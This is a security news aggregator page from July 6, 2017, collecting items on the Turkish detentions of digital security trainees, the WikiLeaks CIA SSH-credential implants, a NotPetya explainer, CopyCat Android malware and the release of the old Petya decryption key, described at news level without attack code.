July 06, 2017

EFF Condemns Detentions at Turkish Digital Security Meeting

July 06, 2017 10:45 PM - EFF Deeplinks -

Turkish police officers in plainclothes yesterday raided a digital security training meeting on the island of Buyukuda in Istanbul, seizing equipment and detaining ten attendees­, including Idil Eser, the director of Amnesty International Turkey. The human rights defenders are still being held in separate detention centers, and were denied access to lawyers and the press for over 24 hours.

Amnesty's Turkey researcher reports that Eser faces at least seven days pre-trial detention under Turkish law; Global Voices Advocacy says the same for the other Turkish citizens arrested in the raid. The status of the trainers, who are from Germany and Sweden, is currently unknown.

EFF believes that everyone should be free to learn to protect themselves online and that this is information they have the right to share. Digital security trainings like this one are frequently held across the world to educate lawyers, journalists, and human rights advocates on how best to protect themselves and their communities. Teaching or learning these skills is certainly no grounds for detention. By conducting this raid, Turkey joins Iran and Ethiopia as countries where innocent citizens are intimidated and arrested simply for learning the basic principles of modern technology.

We join Amnesty International, HIVOS, Article 19, and the rest of the international human rights community in demanding that Turkish authorities release all the Buyukuda detainees, including the two digital security trainers, immediately.

Telecom Hacker Sentenced for Laundering Millions

July 06, 2017 10:20 PM - Dark Reading - Pakistani man sentenced to prison for hacking into PBX systems and generating millions of dollars via bogus premium phone calls and laundering the money.

Massive WWE Leak Exposes 3 Million Wrestling Fans’ Addresses, Ethnicities And More

July 06, 2017 09:50 PM - Office of Inadequate Security - Thomas Fox-Brewster reports: WWE fans take note: an IT error may have left your personal information open to anyone, including addresses, educational background, earnings and ethnicity. Earlier this week, Bob Dyachenko, from security firm Kromtech, told Forbes he’d uncovered a huge, unprotected WWE database containing information on more than 3 million users, noting it was open [...]

Notorious Russian Hacker With Links To FSB Scandal Sentenced To Prison

July 06, 2017 09:45 PM - Office of Inadequate Security - Mike Eckel reports: A notorious Russian hacker whose exploits and later arrest gave glimpses into the intersection of computer crime and Russian law enforcement has been sentenced to two years in prison. The Moscow City Court issued its ruling July 6 against Vladimir Anikeyev in a decision made behind closed doors, one indication of the [...]

Pakistani Man Sentenced for Laundering Millions in Telecom Hacking Scheme

July 06, 2017 09:33 PM - Office of Inadequate Security - A massive international hacking and telecommunications fraud scheme served as a backdrop for an FBI investigation that led to the capture of a Pakistani citizen who played a major role in scamming U.S. companies out of millions of dollars in fees. From November 2008 to December 2012, Muhammad Sohail Qasmani laundered more than $19.6 million [...]

Get 72% off NordVPN Virtual Private Network Service For a Limited Time - Deal Alert

July 06, 2017 09:05 PM - CSO Online -

NordVPN gives you a private and fast path through the public Internet. All of your data is protected every step of the way using revolutionary 2048-bit SSL encryption even a supercomputer can’t crack. Access Hulu, Netflix, BBC, ITV, Sky, RaiTV and much more from anywhere in the world. Unmetered access for 6 simultaneous devices. You're sure to find dozens of good uses for a VPN. Take advantage of the current 72% off deal that makes all of this available to you for just $3.29/month (access deal here). This is a special deal available for a limited time.

To read this article in full or to leave a comment, please click here

Photographer Attacked by Ludicrous Online Voting Patent

July 06, 2017 09:04 PM - EFF Deeplinks -

Ruth Taylor never expected that her hobby would get her sued for patent infringement. Her photography website, Bytephoto.com, barely made enough advertising revenue to cover hosting costs. The site hosts user-submitted photos and runs weekly competitions, decided by user vote, for the best. Ruth’s main business is her own photography. She supports that business by visiting more than a dozen local art festivals in Bucks County, Pennsylvania every year.

In 2007, almost four years after Bytephoto began running online photo competitions, a company called Garfum.com Corporation applied for a patent titled “Method of Sharing Multi-Media Content Among Users in a Global Computer Network.” The patent, U.S. Patent No. 8,209,618, takes the well-known concept of a competition by popular vote and applies it to the modern context of computer networks. On September 23, 2014, Garfum filed a federal lawsuit accusing Bytephoto of patent infringement for allowing its users to vote for their favorite photo.

Ruth didn’t understand how someone could patent online contests. “It seemed like a scam.”

Like many people sued for patent infringement, Ruth first learned of the case when a lawyer who had seen the complaint online called out of the blue, hoping to represent her. She was stunned. “It seemed like a scam,” she said. Ruth didn’t understand how someone could patent online contests. It just didn’t seem logical. A few days later, a process server arrived at her house to formally serve the complaint. Then Ruth knew it was real.

Garfum’s opening settlement demand was $50,000. This demand far exceeded Bytephoto’s annual revenue. Ruth learned that defending the case could easily cost more than a million dollars. Since Bytephoto was just a hobby, Ruth had never incorporated it. This meant she was personally on the hook. She faced the choice between paying the settlement and paying even higher litigation costs. This was especially frustrating because Bytephoto began allowing users to vote for their favorite photographs years before Garfum filed its patent application. You can’t patent what already exists. But proving this defense in court would take months of expensive discovery.

Fortunately for Ruth, Garfum’s lawsuit arrived after the Supreme Court’s decision in Alice v. CLS Bank. Many judges have allowed challenges under Alice to be filed early in the case rather than waiting for discovery (since the patent itself is the key evidence). EFF agreed to represent Ruth pro bono and filed a motion asking the court to hold the patent invalid under Alice. A few days before the hearing on that motion, Garfum voluntarily abandoned its suit.

Ruth’s case is a perfect example of why Alice improves the patent system. Garfum’s broad and abstract patent did nothing to promote innovation. The idea of voting has been around for centuries. The idea of applying voting to online social networks did not deserve patent protection. Indeed, even Ruth’s own website predated Garfum’s application. Yet a settlement or litigation expenses could quickly have led to the site being shut down. Fortunately, thanks to the Alice ruling, Ruth was able to defeat Garfum’s absurd claim and continue running her site and her business.

BrandPost: It’s Time to Get Serious About Web Application Security

July 06, 2017 09:02 PM - CSO Online -

Historically, IT teams have tended to deploy web application firewalls (WAFs) simply to comply with Payment Card Industry Data Security Standards (PCI DSS). If this is the case in your organization, whether you are a financial services provider or a retailer, it may be time to take another look at these valuable security tools. Many of today’s data security professionals are beginning to recognize that unprotected web applications have become attractive targets for cybercriminals looking for easy entry points into their networks.

The fact is, securing application environments presents a unique and consistent challenge to IT teams. Which is why 83 percent of enterprise IT executives, according to a recent IDG survey, now believe that application security is critical to their IT strategy.

To read this article in full or to leave a comment, please click here

Hacking the State of the ISIS Cyber Caliphate

July 06, 2017 08:55 PM - Dark Reading - Researchers say Islamic State's United Cyber Caliphate remains in its infancy when it comes to cyberattack expertise.

FL: Notice from Baptist Medical Center South to EEG Patients Regarding a Missing Hard Drive

July 06, 2017 08:49 PM - Office of Inadequate Security - Baptist Medical Center South (“Baptist South”) is committed to protecting the security and con dentiality of our patients’ information. Regrettably, this notice concerns an incident involving some of that information. On May 18, 2017, Baptist South learned that a backup hard drive used for EEG testing was missing from an EEG room. We immediately began [...]

Rethinking what it means to win in security

July 06, 2017 08:35 PM - CSO Online -

Are we winning at security right now?

Before you answer (too late, right?), take a moment to consider what it means to win. Less trick question and more a candid exploration of our collective mindset in security.

We remain flooded with headlines and conference talks that decry our losses and offer approaches for us to win. The constant negativity poisons our mindset to the point where we question if security even matters, if we matter.

To be certain, security matters. Increasingly, security matters. Which means you matter. The key is understanding what success for security leaders actually is.

To read this article in full or to leave a comment, please click here

Wikileaks: BothanSpy and Gyrfalcon CIA Implants steal SSH Credentials from Windows and Linux OSs

July 06, 2017 08:18 PM - Security Affairs -

WikiLeaks leaked documents detailing BothanSpy and Gyrfalcon CIA implants designed to steal SSH credentials from Windows and Linux OSs.

WikiLeaks has published a new batch of documents from the Vault7 dump detailing two new CIA implants alleged used by the agency to intercept and exfiltrate SSH (Secure Shell) credentials from both Windows and Linux operating systems with different attack vectors.

The first implant codenamed BothanSpy was developed to target Microsoft Windows Xshell client, the second one named Gyrfalcon was designed to target the OpenSSH client on various Linux distros, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.

BothanSpy and Gyrfalcon are able to steal user credentials for all active SSH sessions and then sends them back to CIA cyber spies.

BothanSpy is installed as a Shellterm 3.x extension on the target machine, it could be exploited by attackers only when Xshell is running on it with active sessions.

Xshell is a terminal emulator that supports SSH, SFTP, TELNET, RLOGIN and SERIAL for delivering industry leading features including a tabbed environment, dynamic port forwarding, custom key mapping, user defined buttons, VB scripting, and UNICODE terminal for displaying 2 byte characters and international language support.

“BothanSpy only works if Xshell is running on the target, and it has active sessions. Otherwise, Xshell is not storing credential information in the location BothanSpy will search.” reads the user manual.

“In order to use BothanSpy against targets running a x64 version of Windows, the loader being used must support Wow64 injection. Xshell only comes as a x86 binary, and thus BothanSpy is only compiled as x86. Shellterm 3.0+ supports Wow64 injection, and Shellterm is highly recommended.

The Gyrfalcon implant works on Linux systems (32 or 64-bit kernel), CIA hackers use a custom malware dubbed JQC/KitV rootkit for persistent access.

The implant could collect full or partial OpenSSH session traffic, it stores stolen information in a local encrypted file for later exfiltration.

“Gyrfalcon is an SSH session “sharing” tool that operates on outbound OpenSSH sessions from the target host on which it is run. It can log SSH sessions (including login credentials), as well as execute
commands on behalf of the legitimate user on the remote host.” reads the user manual of Gyrfalcon v1.0.

“The tool runs in an automated fashion. It is configured in advance, executed on the remote host and left running. Some time later, the operator returns and commands gyrfalcon to flush all of its collection to disk. The operator retrieves the collection file, decrypts it, and analyzes the collected data”

Wikileaks also published the user guide for Gyrfalcon v2.0, the implant in composed of  two compiled binaries that should be uploaded by attackers to the target platform.

BothanSpy and Gyrfalcon

“The target platform must be running the Linux operating system with either 32- or 64-bit kernel
and libraries. Gyrfalcon consists of two compiled binaries that should be uploaded to the target
platform along with the encrypted configuration file. ” continues the malware.

“Gyrfalcon does not provide any communication services between the local operator computer and target platform. The operator must use a third-party application to upload these three files to the target platform.”

Below the list of release published by Wikileaks since March:

Pierluigi Paganini

(Security Affairs – BothanSpy and Gyrfalcon, CIA)

&https

The post Wikileaks: BothanSpy and Gyrfalcon CIA Implants steal SSH Credentials from Windows and Linux OSs appeared first on Security Affairs.

Let’s Encrypt to Offer Wildcard Certificates in 2018

July 06, 2017 08:04 PM - Threatpost - Certificate authority Let's Encrypt said this week it will begin offering wildcard certificates in 2018.

Report: Second quarter dominated by ransomware outbreaks

July 06, 2017 07:06 PM - Malwarebytes Unpacked -

The second quarter of 2017 brought ransomware to unprecedented levels with worldwide outbreaks that went almost out of control. In scenarios reminiscent of yesteryears worms, WannaCry created global panic as it used a critical vulnerability in the SMBv1 protocol to propagate like wildfire.

Within hours, hundreds of thousands of machines in over 150 countries were infected and as investigations into the attacks went on, it was discovered that other threat actors had also been leveraging the leaked government-created exploits.

Ransomware continued to be the most distributed type of malware, topping 70% of all threats in June with the likes of Cerber, Troldesh, and Jaff. Interestingly, we witnessed other payloads delivered alongside ransomware, infecting users with Cerber, Kovter, Nymain, and Boaxxee all at once.

In this report, we will provide a quick update on the ransomware that does not want to die off, namely Locky and also review the latest outbreak with the rebranded Petya that wreaked havoc in the Ukraine and affected several multinational companies.

With all this ransomware buzz, we can’t forget about the “other threats” which, as a matter of fact, were also somewhat influenced by the aforementioned events. Malvertising was the major engine behind drive-by download attacks that leveraged various exploit kits, most notably RIG EK, Magnitude EK and Astrum EK.

We noted new and somewhat unexpected tech support scam campaigns, with for instance the use of spam and fake Amazon notifications. Typically those come with malicious attachments but in this instance, they contained links that ultimately locked up the user’s browser and urged to dial the so-called Microsoft technicians.

Finally, this report wouldn’t be complete without our usual Researcher Spotlight section, featuring Jean-Philippe ‘Tinfoil Hat’ Taggart.

Download full report here

Thanks for reading and safe surfing!

The post Report: Second quarter dominated by ransomware outbreaks appeared first on Malwarebytes Labs.

Wikileaks Unveils CIA Implants that Steal SSH Credentials from Windows & Linux PCs

July 06, 2017 06:41 PM - The Hacker News - WikiLeaks has today published the 15th batch of its ongoing Vault 7 leak, this time detailing two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH (Secure Shell) credentials from targeted Windows and Linux operating systems using different attack vectors. Secure Shell or SSH is a cryptographic network protocol used for remote login to machines and servers securely

New Google Security Controls Tighten Third-Party Data Access

July 06, 2017 06:35 PM - Dark Reading - Google adds OAuth app whitelisting to G Suite so admins can vet third-party applications before users can grant them authorized data access.

4 Key Identity and Access Management Priorities and Investment Drivers

July 06, 2017 06:35 PM - CSO Online -

What drives your decisions around identity and access management (IAM)? According to the 2016 IDC Global Identity Management Assessment Survey, if you’re looking at an IAM solution, you’re likely most interested in one of four things: how effective a solution is, how it affects compliance, how much it simplifies IAM, or how much it costs. Four different buyers with four different priorities, to be sure—but also with a whole lot in common when it comes to solution drivers.

Whatever your priority as a buyer, there’s one decision driver that’s very likely near the top of your list: strengthening identity and access security. On a scale of 1-100, buyers who focused on efficacy and buyers who focused on compliance both scored at 75. Buyers who focused on simplification also scored relatively high at 64. That’s nearly as high as they scored their top priority of efficacy and compliance.

To read this article in full or to leave a comment, please click here

Sabre Breach Investigation Concludes with Impact Limited

July 06, 2017 06:30 PM - Dark Reading - The travel company finds that attackers gained limited access to a subset of its bookings in its reservation system.

CopyCat Malware Infects 14 Million Android Devices

July 06, 2017 06:30 PM - Dark Reading - A new malware strain is discovered with a novel approach to infecting Android handheld devices with adware.

IDG Contributor Network: These are the good ol' days of cybersecurity

July 06, 2017 06:30 PM - CSO Online -

One thing is an absolute truism of cybersecurity: it is one of the fastest changing realms currently known to humanity, and one that we are unable to predict. Cybersecurity is like earthquakes. We know that one is coming sometime in the future, but we don’t know where or when it will hit, what magnitude it will be, or what kind of destruction it will bring. 

As bad as things might seem right now with the most current ransomware, we are going to look back on these days and think “It was so easy to protect ourselves back then, and we didn’t realize it.” The future will bring new challenges. From my vantage point of working with many different clients and speaking with many different security practitioners, here are my prognostications of things to come:

To read this article in full or to leave a comment, please click here

3 Tips to Get the Most Out of Black Hat/Defcon

July 06, 2017 06:21 PM - CSO Online -

Las Vegas. Hate it or love it, for seven days each year Sin City is the gathering place for BSides Las Vegas, Black Hat, and DEF CON. Combined, these events are arguably the largest security gathering in North America, with professionals and enthusiasts both in attendance. Here's how to get the most out of your trip to the desert this summer.

Relax, let the conference do the work for you:

Among the three conferences, you'll be surrounded by upwards of 30,000 people or more during the week. This can present a bit of a hassle when it comes to time management.

The best way to deal with this is to make plans ahead of time … and stick to them. Start by looking at the talk outlines and see who is presenting. The DEF CON speakers list is available here, and the Black Hat list is here. At the time this article was written, the BSides Las Vegas schedule was not available. Edit: The BSides Las Vegas schedule is online, and can be found here.

To read this article in full or to leave a comment, please click here

All this EternalPetya stuff makes me WannaCry

July 06, 2017 06:15 PM - Malwarebytes Unpacked -

Another week goes by and yet again we have another ransomware outbreak initially dropped by a malicious software update and eventually spreading within internal networks using several methods – including EternalBlue – the leaked exploit from the ShadowBrokers group.

Security researchers can’t seem to catch a break when it comes to holidays and significant malware variants being unleashed to the wild. While many of us may have been enjoying the nice summer holiday or celebrating American Independence Day by blowing up small pieces of it, @hasherezade was hard at work deconstructing this particular piece of code and filling us in on the technical details and discoveries as they were being made.

We’ll take what we know and what we’ve learned and try to summarize the mind-boggling technical information into a simple structure that even my dear mother will be able to understand (love you, Mom!).

 

So what happened?

Sometime prior to June 27th, Ukrainian software company M.E.Doc was reportedly infiltrated by an unknown group of hackers. The attackers managed to remain undetected within the company network for an (as of yet) unknown period of time and were able to leverage a number of resources to eventually grant themselves access to the source code and update mechanisms of the widely used M.E.Doc software.

M.E.Doc makes and distributes accounting software that is targeted primarily towards Ukrainian residents and business entities, as well as a few others outside of the national boundaries. There are reports that this software is government mandated within Ukraine, although we can find no factual reference for this claim. Regardless, the software is used by a significant percentage of the Ukrainian population and a number of organizations outside of Ukraine.

Using the system-wide access afforded with the previous breach of the M.E.Doc system, the attackers were able to spend some time to understand the network infrastructure and to become familiar with the M.E.Doc source code.

On June 27th, the attackers used the software update mechanisms of the M.E.Doc software to distribute a newly compiled version of the popular accounting software that contained malicious code which infected systems with a ransomware variant. Any system configured to automatically perform updates would have been infected without any user interaction required.

Once infection occurs, the code is configured to use the same EternalBlue and DoublePulsar modules that were used in the WannaCry incident to spread to other vulnerable systems on the network. This allows the malicious code to infect not only machines utilizing the M.E.Doc software but also any other machine on the network.

In addition to EternalBlue and DoublePulsar, 3rd party researchers uncovered the use of an additional NSA derived exploit, EternalRomance, being used to infect any machine that connects to the affected network. This particular exploit uses two built-in Windows administrative tools, called PSExec and WMI, to help execute malware on remote connections. In essence, this allows the malware to infect all machines that it can – which would include any home machine connected to the enterprise server via VPN.

After susceptible machines have been infected with the ransomware, the Master File Table (MFT) and the Master Boot Record (MBR) of the computer are encrypted and the MBR is overwritten to display the ransom note.

ransom note

Both the Master File Table and the Master Boot Record are used to provide instructions to the PC on what to do after the power button is pressed and where important files are located on disk. Without proper configuration of both of these files, computer systems can’t boot properly and thus will fail to do so.

 

Why the strange name for the malware?

As researchers began understanding the code, all sorts of various names were thrown out as a means to name the malware family. NotPetya, Expetr, EternalPetya, and even simply Petya have all been used to describe the malware. It seems strange that so many researchers came up with a similar naming convention, but here is where this particular infection gets interesting.

This specific methodology of infection is synonymous with the Petya ransomware family. Furthermore, the language of the ransom note, plus information within the decompiled malware code led researchers to initially suspect the same malware author had been responsible for both variants. But as researchers further dissected the code, a few key differences began to emerge.

First, Petya differed from EternalPetya in the fact that the newly discovered code was utilizing the NSA derived EternalBlue, DoublePulsar, and EternalRomance modules to spread to connected machines on the network. This would have been a new evolution in the propagation methodology of the original Petya.

Second, the malware appeared to be an edited version of the Petya ransomware rather than a newly compiled version. @hasherezade did a terrific job of breaking this all down in the post titled EternalPetya Yet Another Stolen Piece in the package.

In the post, @hasherezade explains that the original Petya ransomware code has been craftily modified, rather than complied from scratch, to allow reuse of previous malware code. This has a number of advantages for the new author such as a decreased workload in writing ransomware from the ground up and helping to misdirect attribution by (among other things) excluding possible language clues that we have seen with other strains.

Third, the self-proclaimed author of the original Petya ransomware family, @JanusSecretary, posted to a dormant Twitter account claimingwe’re back havin a look in “notpetya” maybe it’s crackable with our privkey

Janus tweet

 

 

This, along with the information that the original malware had been edited rather than compiled, leads to the conclusion that Janus was not likely involved with the dissemination of the code, but rather merely a scapegoat for the EternalPetya authors.

 

If not @JanusSecretary, who can we blame?

As is typical with these sorts of malicious malware strains, attribution can be difficult if not impossible. Malware authors take significant steps to cover their tracks and utilize a number of anonymizing services to hide their origin, intent, and methodologies.

TOR, proxies, and VPN’s are used to conceal identifying connection information. Bitcoin and other digital currencies are used to conceal payment information. Cryptocurrency tumblers are used to mix up digital currency transactions thus confusing the trail back to the original source. And in at least this case, a well-known ransomware family was ripped off as a means to confuse the original author.

While we can’t fully rule out involvement in EternalPetya by @JanusSecretary, the information indicates this probably not to be the case. There would have been no need to go through the trouble of modifying the original malware variant when a new variant could more easily be compiled with the new information.

So who else could it have been?

It’s all the rage these days to blame Russia for any and everything related to malicious activity and the Ukrainian government wasted no time in doing so.

On July 1st, the Ukraine State Security Service, SBU, claimed that the same hackers who attacked its power grid in December 2016 were also responsible for the EternalPetya outbreak. The Ukrainian government was quick to blame Russia for the EternalPetya attack, but a spokesman for the Kremlin dismissed the claims as “unfounded blanket accusations”. The Russian government also pointed out that its own companies were impacted by the attack including Russia’s state-owned oil company, Rosneft, and Russian steel maker, Evraz.

Indeed, we have found no indications that EternalPetya was a Russian, or state-sponsored attack and we have seen no Indicators of Compromise (IOC’s) to indicate otherwise.

Rather, the most plausible explanation is that a group of sophisticated attackers managed to gain access to a widely used software company and used that access to distribute a modified version of a known ransomware variant as a means to extort payments from infected users.

While this is little more than speculation at this point, all indicators point to this being the most plausible explanation.

repeated

unoptimized code is an indicator of re-use

 

Can the encrypted files be retrieved?

In short, it’s probably not likely. As with the WannaCry outbreak, the authors of this malware variant made some critical mistakes in the payment and decryption methodologies. As @hasherezade points out in the post titled EternalPetya and the lost Salsa20 key, ‘after being read and used for the encrypting algorithm, the stored Salsa key is erased from the disk’.

In previous Petya versions, the Salsa key, basically the key that can lock or unlock the contents, was encrypted with the attackers public key and converted to a hashed string. This meant that although the Salsa key is erased from disk as we’ve seen with EternalPetya, the key was still available to the attackers who had the private key to decrypt it.

In essence, the authors of the EternalPetya variant erased the key that was vital in decrypting the files, thus leaving the decryption of files highly unlikely.

This flaw with the decryption key is what caused the initial contradiction of this particular malware variant in being called a ‘wiper’ vs ‘ransomware’. Regardless of the designation, victims are paying a ransom with the hopes of obtaining their files. There is no guarantee that payment will successfully restore files and those who pay always gamble with this risk. This is by very definition the behavior of ransomware.

In addition to that, the email address that the attackers configured the malicious code to display has since been terminated by the email provider. This leaves no ability for infected users to contact the attackers and arrange for the decryption of files.

So unless a future decryptor emerges that utilizes a masterkey or a flaw in the encryption routine, it remains unlikely that infected users have a means to restore their files.

 

So then, what’s next?

On July 3rd, the head of Ukraine’s Cyber Police suggested that M.E.Doc is under investigation and will potentially face charges related to the incident. As reported by APNews: Col. Serhiy Demydiuk, the head of Ukraine’s National Cyber Police unit, said in an interview with The Associated Press that Kiev-based M.E. Doc’s employees had blown off repeated warnings about the security of their information technology infrastructure.

“They knew about it,” he told the AP. “They were told many times by various anti-virus firms. … For this neglect, the people in this case will face criminal responsibility.”

On July 4th, Ukrainian federal police seized several computer servers used by M.E.Doc. Video quickly appeared online reportedly showing the Ukrainian federal police storming the M.E.Doc facility and establishing control over the property. While I admittedly don’t speak Ukrainian, and for all I know these guys could be talking about rescuing kittens, I believe this video to accurately depict the raid on the M.E.Doc facility.

 

Additionally, as of this writing, the M.E.Doc website is offline as are the other domains listed as using the same IP. For all intents and purposes, at least for the time being, M.E.Doc may be done operating as a software entity.

It would be important to note that current M.E.Doc users shouldn’t use or upgrade the software until further notice, but with the developments surrounding the confiscation of the M.E.Doc servers, I’m not sure users should be holding their breath in anticipation.

 

What did we learn?

Apparently, we learned little from the WannaCry outbreaks of months past. While the crafty infection of the M.E.Doc servers indeed provided a unique distribution method, the successful use of the NSA derived exploits leaves little excuse for the infection of network connected machines.

It begins to get difficult to have sympathy for apathetic I.T. admins who have failed to apply available updates to address the vulnerabilities targeted within the EternalBlue, DoublePulsar, and EternalRomance exploits. These issues have been thoroughly discussed and have garnered worldwide attention.

Mitigation techniques exist for all of the exploit-driven distribution methodologies and include everything from applying Microsoft updates to manually disabling SMB functionality.

We could recommend to these I.T. admins that had they been equipped with Malwarebytes Endpoint Protection, which includes anti-exploit and anti-ransomware technologies, they would have protected their users from this sort of attack – but honestly, I’m not sure they would listen even if we did.

So instead, we’ll focus our message towards the loyal readers of this blog and to people like my dear mother who need understand that malicious attacks can come from any avenue and at any time. Never under estimate the security of the data on your machine, as you may wake up one morning to find all of your most valuable documents either held ransom or worse, completely unrecoverable no matter how much money is paid.

Ensure that valuable documents are routinely backed up and saved to offline or cloud storage solutions. And ensure that you use a reliable and technically advanced security product such as Malwarebytes to help protect your sensitive information and ensure you don’t fall victim to this sort of devastating attack.

While it may not be the most ideal solution, a strong defensive strategy is best in the current age of highly evolving and sophisticated malware that is capable of destroying all of your most important files in a matter of seconds.

The post All this EternalPetya stuff makes me WannaCry appeared first on Malwarebytes Labs.

News in brief: Parliament hack ‘amateur attack’; ‘Humpty Dumpty’ in great fall; Google faces more EU fines

July 06, 2017 05:56 PM - Naked Security - Your daily round-up of some of the other stories in the news

CopyCat Malware Infected 14M Android Devices, Rooted 8M, in 2016

July 06, 2017 05:49 PM - Threatpost - Over the course of two months last year the Copycat malware infected 14 million Android devices and rooted more than half of them, roughly eight million devices.

TN: Ransomware hits one Tennessee city’s emergency services

July 06, 2017 05:46 PM - Office of Inadequate Security - AP reports: Two branches of a Tennessee city’s emergency services have been hit by ransomware as part of a worldwide malware attack that began in May. […] Norville says most of the affected data is not retrievable, and it is unclear if any significant files have been lost. Two file servers and 19 computers within [...]

CopyCat Android Rooting Malware Infected 14 Million Devices

July 06, 2017 05:17 PM - The Hacker News - A newly uncovered malware strain has already infected more than 14 Million Android devices around the world, earning its operators approximately $1.5 Million in fake ad revenues in just two months. Dubbed CopyCat, the malware has capabilities to root infected devices, establish persistency, and inject malicious code into Zygote – a daemon responsible for launching apps on Android, providing

The key to old Petya versions has been published by the malware author

July 06, 2017 05:06 PM - Malwarebytes Unpacked -

As research concluded, the original author of Petya, Janus, was not involved in the latest attacks on Ukraine. His original malware was pirated and extended by an unknown actor (read more here). As a result of the recent events, Janus probably decided to shut down the Petya project. Similarly to the authors of TeslaCrypt, he released his private key, allowing all the victims of the previous Petya attacks, to get their files back.

(The author of Petya has been known for previously leaking the keys of his rival, Chimera ransomware – details here).

[UPDATE] Researcher Anton Ivanov confirmed by his experiments that the key is authentic.

What exactly happened?

Yesterday, Janus has made a public announcement on Twitter:

The message contained a link to the file, hosted at mega.nz service.

The linked file was encrypted and password protected:

After guessing the password and decrypting the package with the help of openssl, I got the following plaintext:

Congratulations!
Here is our secp192k1 privkey:
38dd46801ce61883433048d6d8c6ab8be18654a2695b4723
We used ECIES (with AES-256-ECB) Scheme to encrypt the decryption password into the "Personal Code" which is BASE58 encoded.

It seems that this is Janus’ private key for all the previous Petyas.

Can it help in case of EternalPetya/NotPetya?

This key cannot help in case of EternalPetya, since, in this particular case, the Salsa keys are not encrypted with Janus’ public key, but, instead of this, erased and lost forever (read more). It can only help the people who were attacked by Petya/Goldeneye in the past.

What is the value added by having this key?

Just to recall, the first version of Petya, Red Petya, has been successfully cracked by leo_and_stone. Based on his work, various decryptors have been released, i.e. antipetya live CD.

The error in the second version – a.k.a. Green Petya, revealed by me, was not as severe. Yet, it allowed for writing a bruforcer. Thanks to the GPU-based solution implemented by procrash, the process of cracking the Salsa key has been sped up to 3 days.

Higher versions fixed the flaws to an extent making cracking of the Salsa key no longer possible.

Thanks to the currently published master key, all the people who have preserved the images of the disks encrypted by the relevant versions of Petya, may get a chance of getting their data back.

Further research related to the verification of the obtained material and the decryptor is in progress. We will keep you updated, please stay tuned!

Appendix

Goldeneye – the last Petya version released by Janus:

Goldeneye Ransomware – the Petya/Mischa combo rebranded

 


This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordp.

The post The key to old Petya versions has been published by the malware author appeared first on Malwarebytes Labs.

Encryption thwarting investigators as federal government taps increase

July 06, 2017 05:02 PM - Naked Security - Annual wiretap report lifts the lid on crime investigation, revealing that the cost is rising sharply - and partly funded by drugs busts

FPCollab: Intelligence Sharing for Risk, Security and Business Leaders

July 06, 2017 05:00 PM - Flashpoint -

Information sharing in security and intelligence, as we all know, is critical to ensuring the success of defenders of both public and private organizations. This concept has become even more evident in the last twelve months following our expansion into Business Risk Intelligence (BRI). While traditional applications of cyber threat intelligence are largely tactical, indicator-centric, and designed specifically for cybersecurity teams, BRI’s strategic nature and focus on finished intelligence aims to help all business units mitigate widespread risk across a wide range of use cases.

But since addressing many of these use cases — from fraud and ransomware to supply chain vulnerabilities and insider threats — can be complex, challenging, and even unprecedented for many organizations, we knew we had to ensure that our customers and subject matter experts alike had timely, trusted, secure access to the latest information and leading expertise pertaining to such threats.

At first, we considered having our customers and team members join one of the intelligence community’s many existing information-sharing groups. But the more research we did, the more apparent it become that no existing group aligned well enough with BRI’s strategic, risk-centric focus and the broad spectrum of use cases our customers sought to address. So instead of joining a group that wasn’t the best fit for our (and our customers’) needs, we joined forces with our customers and our subject matter experts and created one of our own. Fittingly, it’s called Flashpoint | Collaboration — better known as FPCollab.

Over the last year, FPCollab has grown to support a trusted network of professionals by providing timely insights and intelligence to facilitate more effective decisions around risk. Consisting exclusively of Flashpoint customers and team members, this uniquely diverse and collaborative community comprises the following:

• Experts from leading organizations in 18 industries across the public and private sectors


• Native or fluent speakers of Arabic, Mandarin, Farsi, Turkish, Kazakh, Spanish, French, German, Russian, Ukrainian, Italian, and Portuguese


• Threat intelligence pioneers who have built and led top global intelligence teams


• Cyber and physical security experts with skills honed during careers in the U.S. military and public-sector intelligence agencies 


• Leaders representing business units including cybersecurity, physical security, executive protection, fraud, M&A, supply chain, insider threat, anti-money laundering, counterterrorism, vendor risk management, human resources, engineering, compliance, and public policy 


• Subject matter experts with comprehensive visibility into the most exclusive regions of the Deep & Dark Web 


We strive for FPCollab to help organizations across all industries and business units leverage our joint wisdom and intelligence to alleviate the broad spectrum of challenges and uncertainties contributing to their overall risk. And given the continual growth and enthusiastic participation of FPCollab’s esteemed pool of members — not to mention the countless complex challenges these members have helped one another address — I couldn’t be prouder of the community we’ve all created.

For more information regarding Flashpoint | Collaboration, Business Risk Intelligence (BRI), or to speak with one of our subject matter experts, please contact us.

 

 

The post FPCollab: Intelligence Sharing for Risk, Security and Business Leaders appeared first on Flashpoint.

Google Patches Critical ‘Broadpwn’ Bug in July Security Update

July 06, 2017 04:30 PM - Threatpost - The July Android Security Bulletin patches 11 critical remote-code execution bugs including one dubbed ‘Broadpwn’ that impacts both Android and iOS devices.

Black Hat Survey: Security Pros Expect Major Breaches in Next Two Years

July 06, 2017 04:00 PM - Dark Reading - Significant compromises are not just feared, but expected, Black Hat attendees say

The iPhone at 10: Still No Major Malware

July 06, 2017 03:59 PM - The Mac Security Blog - Many people are writing about the success of the iPhone, and how ten years on, we can clearly see how it changed personal computing. As the fastest-selling consumer electronic device ever, this pocket computer has swept across the globe like a tsunami, selling hundreds of millions of units. In the past year alone, Apple has […]

So, you want a master's degree in cybersecurity?

July 06, 2017 03:32 PM - CSO Online -

In last week's Cybersecurity Business Report, we suggested you might want to send your kid to cybersecurity school (college).

This week, we take a cursory glance at some cybersecurity master’s degree programs in the U.S. The list—culled from the MastersInCyber.com directory—is intended as a starting point and is not an endorsement of any particular school. Each of the schools presented has its own unique courses, and some get into security niches not covered by others.

To read this article in full or to leave a comment, please click here

Security Experts & Hackers: We're Not So Different

July 06, 2017 03:00 PM - Dark Reading - Using the similarities among hackers and security programmers can be an advantage.

IDG Contributor Network: Understanding the basics of threat abstraction and modeling

July 06, 2017 02:40 PM - CSO Online -

Threat Abstraction and Modeling is an important piece of planning in the enterprise as it can be used as an approach to better secure software. Spending some time during your planning stages thinking about threats and potential threats to your latest project can pay for itself in spades when the rubber meets the road and you’re ready to build out or deploy your latest software project or infrastructure installation.

While on its surface, the topic of threat modeling seems like an advanced skill and above your pay grade, in reality, as humans, we have a predisposition to employ threat modeling in our lives already. For example, you may already ask yourself: 

To read this article in full or to leave a comment, please click here

The Growing Danger of IP Theft and Cyber Extortion

